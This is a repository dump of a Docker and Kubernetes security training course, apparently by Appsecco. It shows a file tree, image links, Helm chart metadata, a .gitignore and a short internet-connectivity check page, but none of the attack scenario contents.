├── gitbook ├── README.md ├── getting-started │ ├── setup-working-script.md │ ├── images │ │ ├── import.png │ │ ├── process.png │ │ ├── select-import.png │ │ └── kubectl-get-pods.png │ ├── internet-check.md │ ├── configure-kubectl.md │ ├── import-vm.md │ ├── vuln-apps.md │ └── kubernetes-cluster-setup.md ├── cover.jpg ├── extra │ ├── images │ │ ├── katacoda.png │ │ ├── contained-af.png │ │ ├── cgroup-with-shares.png │ │ ├── play-with-docker.png │ │ └── cgroup-with-out-shares.png │ ├── katacoda.md │ ├── contianed-af.md │ ├── play-with-docker.md │ ├── lsm.md │ ├── exploiting-cluster-secrets.md │ ├── play-with-kubernetes.md │ └── control-groups.md ├── intro │ ├── images │ │ ├── abhisek.png │ │ ├── warning.png │ │ └── madhuakula.png │ └── disclaimer.md ├── about-us │ ├── images │ │ ├── blackhat.png │ │ ├── logo_cka.png │ │ ├── logo_ckad.png │ │ ├── oscp-certs.png │ │ ├── troopers.png │ │ ├── about-appsecco.png │ │ ├── burp-suite-essentials.png │ │ └── security-automation-with-ansible2.png │ └── about-appsecco.md ├── deploy-app │ ├── images │ │ ├── helm-ls.png │ │ ├── delete-deploy.png │ │ ├── helm-deploy.png │ │ ├── helm-deploy-access.png │ │ ├── update-deployment.png │ │ └── deploy-app-get-pods.png │ ├── using-helm.md │ └── using-yaml.md ├── kubeaudit │ ├── images │ │ └── kubeaudit.png │ └── readme.md ├── scenario-2 │ ├── images │ │ ├── check-ip.png │ │ ├── app-login.png │ │ ├── discussion.png │ │ ├── flag-metadata.png │ │ ├── internal-metadata.png │ │ └── kube-env-metadata.png │ ├── discussion.md │ ├── solution.md │ └── scenario.md ├── scenario-3 │ ├── images │ │ ├── exec-pod.png │ │ ├── git-app.png │ │ ├── printenv.png │ │ ├── commit-log.png │ │ ├── discussion.png │ │ ├── default-svc.png │ │ └── revert-and-secrets.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── demos │ ├── images │ │ ├── CVE-2019-5736_1.gif │ │ └── CVE-2019-5736_2.gif │ ├── cve-2019-5736.md │ └── cve-2019-9901.md ├── scenario-1 │ ├── images │ │ ├── app-login.png │ │ ├── 
discussion.png │ │ ├── docker-config.png │ │ ├── pull-private-image.png │ │ ├── docker-registry-login.png │ │ ├── information-disclosure.png │ │ ├── source-code-hardcoded-key.png │ │ └── path-traversal-exploitation.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-4 │ ├── images │ │ ├── app-login.png │ │ ├── discussion.png │ │ ├── ping-google.png │ │ ├── download-docker.png │ │ ├── ping-google-id.png │ │ ├── host-docker-images.png │ │ ├── custom-docker-socket.png │ │ ├── extract-docker-binary.png │ │ └── host-docker-containers.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-5 │ ├── images │ │ ├── discussion.png │ │ ├── nmap-scan.png │ │ ├── get-ns-data.png │ │ ├── get-pod-name.png │ │ ├── mysql-access.png │ │ └── nmap-mysql-bruteforce.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── scenario-6 │ ├── images │ │ ├── deploy-pod.png │ │ ├── discussion.png │ │ ├── telnet-tiller.png │ │ ├── helm-deploy-pwnchart.png │ │ ├── helm-with-host-flag.png │ │ ├── kube-secrets-after-attack.png │ │ └── kubectl-secrets-before-attack.png │ ├── discussion.md │ ├── scenario.md │ └── solution.md ├── kube-hunter │ ├── images │ │ ├── get-ip-info.png │ │ ├── kube-hunter-results.png │ │ └── kube-hunter-external.png │ └── readme.md ├── environment-setup │ ├── images │ │ ├── ctf-ssh.png │ │ ├── import-ova.png │ │ ├── processing.png │ │ ├── student-ssh.png │ │ ├── vm-host-ssh.png │ │ ├── ctf-vm-login.png │ │ ├── vm-networking.png │ │ ├── ctf-ova-settings.png │ │ ├── select-ctf-ova.png │ │ ├── student-vm-login.png │ │ ├── select-student-ova.png │ │ ├── ssh-host-key-error.png │ │ └── student-ova-settings.png │ ├── common-troublehshooting-steps.md │ ├── ssh-into-machine.md │ └── importing-virtualmachines.md ├── kubernetes-101 │ ├── images │ │ ├── Kubernetes.png │ │ ├── nginx-site.png │ │ ├── after-docker.png │ │ ├── before-docker.png │ │ ├── kubectl-exec.png │ │ ├── kubectl-logs.png │ │ ├── kubectl-pods.png │ │ ├── 
kubectl-combined.png │ │ ├── kubectl-explain.png │ │ ├── kubectl-auth-can-i.png │ │ ├── kubectl-delete-pod.png │ │ ├── kubectl-namespace.png │ │ ├── kubectl-pods-wide.png │ │ ├── kubectl-cluster-info.png │ │ ├── kubectl-describe-pod.png │ │ ├── kubectl-deploy-portfwd.png │ │ └── kubectl-get-secret-yaml.png │ ├── children-guide.md │ └── readme.md ├── kubesec │ ├── images │ │ ├── secure-deployment.png │ │ └── insecure-deployment.png │ └── readme.md ├── advanced-concepts │ ├── images │ │ ├── docker-node.png │ │ ├── run-portainer.png │ │ ├── docker-networks.png │ │ ├── docker-volumes.png │ │ ├── portainer-select.png │ │ ├── portainer-setup.png │ │ ├── wordpress-site.png │ │ ├── docker-service-access.png │ │ ├── docker-service-create.png │ │ ├── portainer-dashboard.png │ │ └── docker-compose-wordpress.png │ ├── docker-volumes-and-networks.md │ ├── portainer.md │ ├── docker-volumes.md │ ├── docker-swarm.md │ └── docker-compoe-wordpress.md ├── kube-bench │ ├── images │ │ ├── get-kube-bench-pod.png │ │ └── kube-bench-results.png │ └── readme.md ├── sysdig-faclo │ ├── images │ │ ├── falco-detection.png │ │ ├── sysdig-falco-start.png │ │ ├── sysdig-falco-scenario.png │ │ └── container-and-commands.png │ └── README.md ├── apparmor-nginx-profile │ ├── images │ │ ├── lsm-after.png │ │ └── lsm-before.png │ └── README.md ├── docker-events │ ├── images │ │ └── docker-system-events.png │ └── README.md ├── docker-image-audit │ ├── images │ │ └── docker-history.png │ ├── scenario.md │ └── solution.md ├── logging-and-monitoring │ ├── images │ │ └── stack-driver.png │ └── readme.md ├── attacking-docker-containers │ ├── images │ │ ├── capsh-print.png │ │ ├── docker-nginx-1.png │ │ ├── docker-nginx-2.png │ │ ├── docker-pid-host.png │ │ ├── capabilities-ping.png │ │ ├── privileged-container.png │ │ ├── capabilities-ping-drop.png │ │ ├── privileged-container-kmsg.png │ │ └── docker-container-namespaces.png │ ├── README.md │ ├── misconfiguration.md │ ├── capabilities.md │ └── namespaces.md 
├── attacking-private-registry │ ├── images │ │ ├── commit-log.png │ │ ├── pull-docker.png │ │ ├── revert-and-secrets.png │ │ ├── enter-into-container.png │ │ └── private-registry-list.png │ ├── scenario.md │ └── solution.md ├── auditing-docker-containers │ ├── images │ │ ├── docker-trust.png │ │ ├── docker-history.png │ │ ├── docker-data-files.png │ │ ├── docker-network-ls.png │ │ ├── docker-tcp-socket.png │ │ ├── docker-volume-ls.png │ │ ├── docker-diff-changes.png │ │ ├── docker-system-info.png │ │ ├── vulners-audit-site.png │ │ ├── docker-bench-security.png │ │ ├── docker-digest-images.png │ │ ├── docker-host-privileges.png │ │ ├── docker-network-inspect.png │ │ ├── docker-no-privileges.png │ │ ├── docker-perform-changes.png │ │ ├── docker-volume-inspect.png │ │ ├── knwon-vulnerabilities.png │ │ ├── docker-apparmor-profile.png │ │ ├── docker-image-packages-query.png │ │ ├── docker-inspect-for-socket.png │ │ └── docker-volume-sensitive-info.png │ ├── README.md │ ├── docker-integrity-check.md │ ├── amicontained.md │ ├── docker-runtime-endpoints.md │ ├── docker-bench-security-audit.md │ ├── docker-volumes-networks.md │ └── docker-images-containers.md ├── docker-logging │ ├── images │ │ └── docker-logs-with-filters.png │ └── README.md ├── getting-started-with-docker │ ├── images │ │ ├── docker-hub.png │ │ ├── docker-ps-a.png │ │ ├── docker-ps.png │ │ ├── docker-images.png │ │ ├── docker-history.png │ │ ├── nginxalpine-host.png │ │ ├── docker-build-image.png │ │ ├── docker-detach-logs.png │ │ ├── helloworld-docker.png │ │ ├── docker-architecture.png │ │ ├── docker-inspect-nginx.png │ │ ├── docker-search-wpscan.png │ │ ├── nginxalpine-container.png │ │ ├── docker-interactive-bash.png │ │ ├── docker-stop-and-remove.png │ │ └── docker-run-welcome-ubuntu.png │ ├── docker-management.md │ ├── dockerfile.md │ ├── docker-run.md │ └── README.md ├── attacking-containers-capabilities │ ├── images │ │ ├── sysmon-top.png │ │ ├── sysmon-capsh.png │ │ ├── sysmon-access.png │ │ ├── 
start-nc-listener.png │ │ ├── sysmon-access-host-flag.png │ │ ├── sysmon-download-payload.png │ │ ├── sysmon-msfvenom-generate.png │ │ ├── sysmon-payload-execution.png │ │ └── sysmon-start-python-server.png │ └── scenario.md ├── docker-volumes-and-networks │ ├── scenario.md │ ├── images │ │ ├── docker-volume-inspect.png │ │ └── docker-volumes-data.png │ └── solution.md ├── attacking-insecure-volume-mounts │ ├── images │ │ ├── docker-client-file.png │ │ ├── nc-student-listen.png │ │ ├── insecure-mount-exploit.png │ │ ├── insecure-mount-node-app.png │ │ ├── insecure-mont-reverse-shell.png │ │ ├── insecure-mount-docker-socket.png │ │ ├── accessing-host-system-using-socket.png │ │ └── insecure-mount-vulnerable-parameter.png │ ├── scenario.md │ └── solution.md ├── exploiting-cluster-secrets │ ├── images │ │ ├── access-docker-swarm-app.png │ │ ├── access-docker-swarm-env.png │ │ ├── docker-swarm-search-locations.png │ │ └── docker-secrets-default-location.png │ ├── scenario.md │ └── solution.md ├── attacking-docker-misconfiguration │ ├── images │ │ ├── misconfig-nmap-scan.png │ │ ├── docker-tcp-host-access.png │ │ └── misconfig-curl-images.png │ ├── scenario.md │ └── solution.md ├── attacking-auditing-docker-registry │ ├── images │ │ ├── docker-analysis-secrets.png │ │ ├── docker-registry-access.png │ │ ├── download-image-locally.png │ │ ├── docker-registry-access-image.png │ │ ├── docker-system-info-registries.png │ │ └── docker-registry-config-secrets.png │ └── docker-registries.md ├── automated-defense-for-container-security │ └── demo.md ├── popular-attacks │ ├── metadata.md │ ├── dockerhub-190k.md │ ├── service-token.md │ ├── cryptojacking.md │ └── dockerhub.md └── automated-defense │ └── readme.md ├── infra-setup ├── Helm-Charts │ ├── README.md │ ├── server-health │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ │ ├── tests │ │ │ │ └── test-connection.yaml │ │ │ ├── service.yaml │ │ │ ├── _helpers.tpl │ │ │ ├── ingress.yaml │ │ │ ├── NOTES.txt │ │ │ └── 
deployment.yaml │ │ └── values.yaml │ ├── mailbox-service │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ │ ├── tests │ │ │ │ └── test-connection.yaml │ │ │ ├── service.yaml │ │ │ ├── _helpers.tpl │ │ │ ├── ingress.yaml │ │ │ ├── NOTES.txt │ │ │ └── deployment.yaml │ │ └── values.yaml │ └── connectivity-check │ │ ├── Chart.yaml │ │ ├── .helmignore │ │ ├── templates │ │ ├── tests │ │ │ └── test-connection.yaml │ │ ├── service.yaml │ │ ├── _helpers.tpl │ │ ├── ingress.yaml │ │ ├── NOTES.txt │ │ └── deployment.yaml │ │ └── values.yaml ├── README.md ├── helm-rbac │ └── helm-rbac.yaml ├── net-tools │ └── net-tools.yaml ├── apps-ingress │ └── apps-ingress.yaml ├── secrets-db-service │ └── secrets-db-service.yaml └── code-base │ └── code-base.yaml ├── .gitignore ├── github-images └── k8s-docker-github-background.png └── MIT-LICENSE.txt /gitbook/README.md: -------------------------------------------------------------------------------- 1 | ![cover page](cover.jpg) -------------------------------------------------------------------------------- /gitbook/getting-started/setup-working-script.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/README.md: -------------------------------------------------------------------------------- 1 | # Helm Charts 2 | 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | gitbook/_book/* 2 | *.pdf 3 | *.epub 4 | *.mobi 5 | 6 | infra-setup/k8s-training-kubeconfig 7 | infra-setup/destroy.sh 8 | -------------------------------------------------------------------------------- /gitbook/cover.jpg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/cover.jpg -------------------------------------------------------------------------------- /gitbook/extra/images/katacoda.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/katacoda.png -------------------------------------------------------------------------------- /gitbook/intro/images/abhisek.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/abhisek.png -------------------------------------------------------------------------------- /gitbook/intro/images/warning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/warning.png -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: server-health 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/intro/images/madhuakula.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/intro/images/madhuakula.png -------------------------------------------------------------------------------- 
/infra-setup/Helm-Charts/mailbox-service/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: mailbox-service 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/about-us/images/blackhat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/blackhat.png -------------------------------------------------------------------------------- /gitbook/about-us/images/logo_cka.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/logo_cka.png -------------------------------------------------------------------------------- /gitbook/about-us/images/logo_ckad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/logo_ckad.png -------------------------------------------------------------------------------- /gitbook/about-us/images/oscp-certs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/oscp-certs.png -------------------------------------------------------------------------------- /gitbook/about-us/images/troopers.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/troopers.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-ls.png -------------------------------------------------------------------------------- /gitbook/extra/images/contained-af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/contained-af.png -------------------------------------------------------------------------------- /gitbook/kubeaudit/images/kubeaudit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubeaudit/images/kubeaudit.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/check-ip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/check-ip.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/exec-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/exec-pod.png 
-------------------------------------------------------------------------------- /gitbook/scenario-3/images/git-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/git-app.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/printenv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/printenv.png -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/Chart.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | appVersion: "1.0" 3 | description: A Helm chart for Kubernetes 4 | name: connectivity-check 5 | version: 0.1.0 6 | -------------------------------------------------------------------------------- /gitbook/demos/images/CVE-2019-5736_1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/demos/images/CVE-2019-5736_1.gif -------------------------------------------------------------------------------- /gitbook/demos/images/CVE-2019-5736_2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/demos/images/CVE-2019-5736_2.gif -------------------------------------------------------------------------------- /gitbook/scenario-1/images/app-login.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/app-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/commit-log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/commit-log.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/discussion.png 
-------------------------------------------------------------------------------- /gitbook/scenario-4/images/app-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/app-login.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/discussion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/discussion.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/nmap-scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/nmap-scan.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/deploy-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/deploy-pod.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/discussion.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/discussion.png -------------------------------------------------------------------------------- /gitbook/about-us/images/about-appsecco.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/about-appsecco.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/delete-deploy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/delete-deploy.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-deploy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-deploy.png -------------------------------------------------------------------------------- /gitbook/extra/images/cgroup-with-shares.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/cgroup-with-shares.png -------------------------------------------------------------------------------- /gitbook/extra/images/play-with-docker.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/play-with-docker.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/import.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/import.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/process.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/get-ip-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/get-ip-info.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/docker-config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/docker-config.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/flag-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/flag-metadata.png 
-------------------------------------------------------------------------------- /gitbook/scenario-3/images/default-svc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/default-svc.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/ping-google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/ping-google.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/get-ns-data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/get-ns-data.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/get-pod-name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/get-pod-name.png -------------------------------------------------------------------------------- /gitbook/scenario-5/images/mysql-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/mysql-access.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/telnet-tiller.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/telnet-tiller.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-ssh.png -------------------------------------------------------------------------------- /gitbook/getting-started/internet-check.md: -------------------------------------------------------------------------------- 1 | # Internet Check 2 | 3 | * Browse to [https://appsecco.com](https://appsecco.com) from your host browser 4 | * Run `curl ifconfig.co` from your virtual machines -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/Kubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/Kubernetes.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/nginx-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/nginx-site.png -------------------------------------------------------------------------------- /gitbook/kubesec/images/secure-deployment.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubesec/images/secure-deployment.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/download-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/download-docker.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/ping-google-id.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/ping-google-id.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-node.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-node.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/helm-deploy-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/helm-deploy-access.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/update-deployment.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/update-deployment.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/import-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/import-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/processing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/processing.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-ssh.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/vm-host-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/vm-host-ssh.png -------------------------------------------------------------------------------- /gitbook/extra/images/cgroup-with-out-shares.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/extra/images/cgroup-with-out-shares.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/select-import.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/select-import.png -------------------------------------------------------------------------------- /gitbook/kube-bench/images/get-kube-bench-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-bench/images/get-kube-bench-pod.png -------------------------------------------------------------------------------- /gitbook/kube-bench/images/kube-bench-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-bench/images/kube-bench-results.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/after-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/after-docker.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/before-docker.png: -------------------------------------------------------------------------------- 
